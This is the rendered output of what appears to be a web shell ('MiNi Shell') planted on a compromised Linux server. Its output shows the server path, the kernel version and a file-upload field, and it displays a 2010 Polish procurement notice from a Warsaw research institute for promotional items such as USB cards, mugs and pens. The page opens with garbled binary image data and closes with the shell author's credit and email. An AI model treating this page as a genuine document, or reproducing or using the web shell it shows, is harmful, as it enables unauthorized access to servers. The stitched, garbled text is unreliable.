JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100705/195922-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa w dwóch transzach materiałów promocyjnych dla Projektu Centrum Badań Przedklinicznych i Technologii (CePT) - GR PN 07 10</b><br>
<b>Numer ogłoszenia: 195922 - 2010; data zamieszczenia: 05.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Biochemii i Biofizyki Polskiej Akademii Nauk , ul. Pawińskiego 5a, 02-106 Warszawa, woj. mazowieckie, tel. 022 6584724, faks 022 6584636.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ibb.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Naukowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa w dwóch transzach materiałów promocyjnych dla Projektu Centrum Badań Przedklinicznych i Technologii (CePT) - GR PN 07 10.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Pamięć USB o wielkości i w kształcie karty kredytowej - 1.000 sztuk
Parametry techniczne:
- port podłączenia: USB 2.0;
- pojemność dysku: min. 8 GB;
- szybkość zapisu: min. 3 MB/s;
- szybkość odczytu: min. 8 MB/s;
- kompatybilność: Windows 2000, XP, 7, Vista; MAC OS
- gwarancja prod.: min. 24 m-ce

Parametry:
- kolor biały, 
- plastikowa 
- grubość 1,6 mm

Oznakowanie: 
- możliwość obustronnego nadruku cyfrowego w technice rastrowej 
- nadruk: full kolor.

2) Kubek - 250 sztuk
Kubek ceramiczny typu MEZZO wraz z opakowaniem: 

Parametry wyglądu: 
- wysokość: 110 mm
- pojemność: 350 ml
- średnica: 86 mm
- kolor: pomarańczowo - biały ( do ? 2/3 wysokości kubka pomarańcz, pozostała ? 1/3 wysokości - biała) 

Oznakowanie
- Nadruk kubka: full kolor/ dwustronny ( zewnętrzny/ wewnętrzny)
- Rodzaj nadruku kubka: Kalka ceramiczna
Opakowanie na kubek: 
- zamknięty kartonik z okienkiem
- materiał:  biały karton.

3) Kubek - 250 sztuk:
Kubek ceramiczny typu MEZZO wraz z opakowaniem 

Parametry wyglądu: 
- wysokość: 110 mm
- pojemność: 350 ml
- średnica: 86 mm
- kolor: granat- biały ( do ? 2/3 wysokości kubka granat, pozostała ? 1/3 wysokości - biała) 

Oznakowanie
- Nadruk kubka: full kolor/ dwustronny 
(zewnętrzny/ wewnętrzny)
- Rodzaj nadruku kubka: Kalka ceramiczna
Opakowanie na kubek: 
- zamknięty kartonik z okienkiem
- materiał:  biały karton.
 
4) Teczka kartonowa - 1.500 sztuk
Parametry: 
- Wymiary 310x220 mm (po złożeniu),
- Teczka z grzbietem (z dowolnego dwubigowego wykrojnika odpowiadającego założeniom)
- karton biały jednostronnie powlekany, 
- gramatura 285 g/m2 ? 10 gr, 

Rodzaj nadruku: 
- druk offsetowy, 
- full kolor jednostronnie, 
- folia matowa jednostronnie, 
- lakier wybiórczy na wybranych elementach.  


5) Długopis plastikowy - 750 sztuk
Plastikowy długopis typu Fast

Parametry:
- wymiary produktu w mm: 140x12x12
- obudowa zewnętrzna w całości z nieprzezroczystego plastiku,  
- Kolor biały z pomarańczowymi elementami
 ( korpus biały , klip biały, tulejka górna pomarańczowa)
- wyposażony w niebieski wkład

Oznakowanie:
- nadruk full color na korpusie techniką tampondruku.
 
6) Długopis plastikowy - 750 sztuk

Plastikowy długopis typu Fast

Parametry:
-	wymiary produktu w mm: 140x12x12
-	obudowa zewnętrzna w całości z nieprzezroczystego plastiku,  
-	Kolor biały z niebieskimi elementami ( korpus biały , klip biały, tulejka górna niebieska)
-	wyposażony w niebieski wkład

Oznakowanie:
-	nadruk full color na korpusie techniką tampondruku.

7) Długopis metalowy - 400 sztuk

Preferowany typ: STAR
Produkt nie gorszej jakości niż długopis: Seria Millenium 

Parametry:
- metal powlekany
- kolor korpusu pomarańczowy ze srebrnym klipem, końcówką i dwoma ozdobnymi ukośnymi pierścieniami
- wyposażony w niebieski wkład

Oznakowanie:
- grawerowanie laserowe.

8) Długopis metalowy - 350 sztuk
Preferowany typ: STAR
Produkt nie gorszej jakości niż długopis: Seria Millenium 

Parametry:
- metal powlekany
- kolor korpusu ciemnoniebieski ze srebrnym klipem, końcówką i dwoma ozdobnymi ukośnymi pierścieniami
- wyposażony w niebieski wkład

Oznakowanie:
- grawerowanie laserowe.

9) Komplet: pióro wieczne + długopis w etui - 250 sztuk
Parametry:
-	korpus metalowy
-	kolor korpusu: granat z chromowanymi kipami i pierścieniami oraz chromowaną końcówką pióra wiecznego

Produkt nie gorszej jakości niż Metallic Set firmy Senator z serii Delgado

Etui: 
-	kolor czarny matowy
-	materiał karton 
-	popielata wkładka z pianki
-	zamkniecie na magnes
-	na dwa przybory do pisania
-	oznakowanie full kolor
-	metoda nadruku: tampondruk. 

10) Długopis metalowy - 250 sztuk
Długopis metalowy z chromowanymi wykończeniami
Parametry:
- zmatowiona powierzchnia
- kolor korpusu pomarańczowy z chromowanymi: końcówką i klipem 
- niebieski wkład
- wymiary: długość 13,9 cm , średnica 1,1 cm
Oznakowanie:
- grawer laserowy. 

11) Długopis metalowy -250 sztuk
Długopis metalowy z chromowanymi wykończeniami

Parametry:
-	zmatowiona powierzchnia
-	kolor korpusu granatowy z chromowanymi: końcówką i klipem 
-	niebieski wkład
-	wymiary: długość 13,9 cm , średnica 1,1 cm

Oznakowanie:
-	grawer laserowy. 

12) Torba papierowa z uchwytami sznurkowymi - 1.000 sztuk
Parametry:
- format: 26x33,5x11cm
- materiał: kreda jednostronnie powlekana 200 g/m2
- kolor biały
- uchwyt ze sznurka 
- zakładka górna wykonana z tektury
- dno torby usztywnione tekturą 400 g

Wykończenie: 
uchwyty ( sznurek) w kolorze torby, mocowane przy górnej krawędzi, przewlekane

Oznakowanie: 
- Full kolor jednostronnie
- druk offsetowy.


13) Teczka materiałowa na dokumenty - 100 sztuk
Teczka materiałowa typu SLIM na dokumenty 
Parametry:
-	wymiary: ok. 41 x 33,5 cm 
-	zamykana na zamek błyskawiczny z kieszenią przednią zamykaną na zamek błyskawiczny
-	z uchwytem do noszenia ze skóry syntetycznej
-	z odpinanym paskiem naramiennym, o regulowanej długości. 
-	kolor torby: pomarańczowy
Oznakowanie:
- Nadruk monochromatyczny, biały z przodu torby
- Metoda nadruku: termotransfer. 

14) Teczka materiałowa na dokumenty - 150 sztuk
Teczka materiałowa typu SLIM na dokumenty 
Parametry:
- wymiary: ok. 41 x 33,5 cm 
- zamykana na zamek błyskawiczny z kieszenią przednią zamykana na zamek błyskawiczny
- z uchwytem do noszenia ze skóry syntetycznej
- z odpinanym paskiem naramiennym, o regulowanej długości. 
- kolor torby: czarny

Oznakowanie:
- Nadruk monochromatyczny, biały z przodu torby
- Metoda nadruku: termotransfer. 

15) Notatnik A5 - 1.000 sztuk
Parametry:
- Format: 148x210 mm wg indywidualnego projektu
- grzbiet bloku klejony
- plecy wzmocnione białym kartonikiem 250 g/m2
- ilość kartek: 50 stron 
- technologia: druk offestowy

Oznakowanie:
- na każdej kartce nadruk full kolor
- podkładka nadruk
-full kolor jednostronny.

16) Notatnik A4 - 500 sztuk
Parametry:
- Format: 210 x  295 cm wg indywidualnego projektu
- nadruk na każdej kartce full kolor
- grzbiet bloku klejony
- plecy wzmocnione białym kartonikiem 250 g/m2
- ilość kartek: 50 stron
- technologia: druk offsetowy

Oznakowanie:
- na każdej stronie nadruk full kolor
- podkładka nadruk
- full kolor  jednostronny.

17) Notatnik w twardej okładce z samoprzylepnymi indeksami (postitami) - 1.000 sztuk 
Parametry:
- wymiar złożonego zestawu 8 x 10,5 x 1,7 cm
- zestaw zawiera 50 większych i 25 mniejszych karteczek odrywanych oraz 5 kolorów samoprzylepnych karteczek po 25 sztuk każdy
- wszystko zapakowane w białe, twarde etui
- indeksy samoprzylepne (typu post-it) 5 x 25 szt. o wymiarach 12 x 45 mm 
- kartki białe mniejsze w notatniku 25 szt. o wymiarach 51 x 74mm. 
- kartki białe większe w notatniku 50 sztuk o wymiarach 102 x 74mm. 

Oznakowanie:
- nadruk na okładce full kolor jednostronnie
- nadruk na karteczkach: 2 kolory.

18) Smycz - 1.000 sztuk
Parametry:
- materiał: płaska tkanina poliestrowa o szerokość ok. 1 mm;
- długość smyczy po złożeniu: 60cm +/- 5 cm
- karabińczyk; zawieszka na telefon;  
- kolor: pomarańczowy

Nadruk:
- sublimacja gazowa
- monochromatyczny biały dwustronny.

19) Wskaźnik laserowy z opcją przewijania slajdów - kolor wiązki laserowej zieleń w ozdobnym etui - 150 sztuk 
Wskaźnik laserowy z opcją przewijania slajdów up and down- kolor wiązki laserowej zieleń w ozdobnym etui
Parametry:
- w kształcie długopisu
- metalowy korpus
- łączność IR
- rozmiary: 120x14 mm
-  długość fali  532 ?  10nM
-  moc: < 1mW
- zdalne sterowanie komputera
- Współpracuje z WIN98SE / ME / 2000 /XP ,7; Mac OS
- dołączone 4 baterie typu: LR1, 1.5V

Oznakowanie:  
- na etui full kolor
- Metoda nadruku: tampodruk.

20) Wskaźnik laserowy z opcją przewijania slajdów - kolor wiązki laserowej czerwień z etui - 250 sztuk

Parametry:
 - Bezprzewodowy 
-  w kształcie długopisu 
-  metalowy korpus
-  pilot USB w skuwce
- w ozdobnym kartonowym etui
- dołączonych 6 baterii i certyfikat na laser II klasy
- współpracuje z WIN98SE / ME / 2000 /XP ,7; Mac OS
- możliwość używania w odległości 15 m 

Oznakowanie:  
- na etui full kolor
- Metoda nadruku: tampodruk.


21) Składany rozgałęziacz portów USB (4 porty USB) z opakowaniem - 250 sztuk
Parametry:
- Obudowa: plastik ABS
- Port podłączenia USB : 2.0
- Współpracuje z WIN98SE / ME / 2000 /XP ,7; Mac OS
- Wielkość produktu: 4.5 x 5 x 4.5 cm
- Kolor obudowy: biały
- Pole zadruku: 20 x 20 mm
Opakowanie: biały karton
Oznakowanie:
Rozgałęziacz: sitodruk 2 kolory
Opakowanie: full kolor, tampondruk. 

22) Mysz optyczna - 250 sztuk

Parametry:
- zwijany kabel
- materiał obudowy: aluminium
- wymiary 8,2 x5,5 x1,5 cm

Opakowanie: karton

Oznakowanie: grawer
Współpracuje z WIN98SE / ME / 2000 /XP ,7; Mac OS. 

23) Zegar ścienny - 150 sztuk
Zegar ścienny w opakowaniu
Preferowany typ:  Champ 
- rozmiar:  średnica: 38 CM
- matowa metalowa oprawa
- cyfry czarne arabskie jednakowej wielkości
- trzy wskazówki: godzina (czarna), minuta (czarna) oraz sekundnik ( czerwony),mechanizm Quartz
- 1 bateria AA dołączona

Opakowanie: biały karton

Oznakowanie:
- Na tarczy Dwa kolory 
- metoda tampondruk
- Na opakowaniu: full kolor..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6, 18.90.00.00-8, 18.93.00.00-7, 22.81.50.00-6, 22.85.00.00-3, 22.85.10.00-0, 30.19.21.21-5, 30.19.21.22-2, 30.23.46.00-4, 30.23.74.10-6, 39.22.21.20-1, 39.25.41.20-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 3.000 (trzy tysiące) złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże prawidłowe zrealizowanie co najmniej jednej dostawy materiałów promocyjnych odpowiadających rodzajem przedmiotowi zamówienia na kwotę nie niższą niż 80.000 złotych brutto.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, gdy Wykonawca przedłoży opłaconą polisę od odpowiedzialności cywilnej na kwotę nie mniejszą niż 100.000 złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ibb.waw.pl/pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Biochemii I Biofizyki Polskiej Akademii Nauk,
02-106 Warszawa, ul. Pawińskiego 5a, pok 40 lub 45.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2010 godzina 10:00, miejsce: Instytut Biochemii I Biofizyki Polskiej Akademii Nauk,
02-106 Warszawa, ul. Pawińskiego 5a, pok 40 lub 45.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Centrum Badań Przedklinicznych i Technologii (CePT) współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka, lata 2007-2013, Priorytet 2. Infrastruktura sfery B+R, Działanie 2.2 Wsparcie tworzenia wspólnej infrastruktury badawczej jednostek naukowych, realizowany na podstawie umowy o dofinansowanie  projektu Nr POIG.02.02.00-14-024/08-00, z dnia 08.10.2009r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com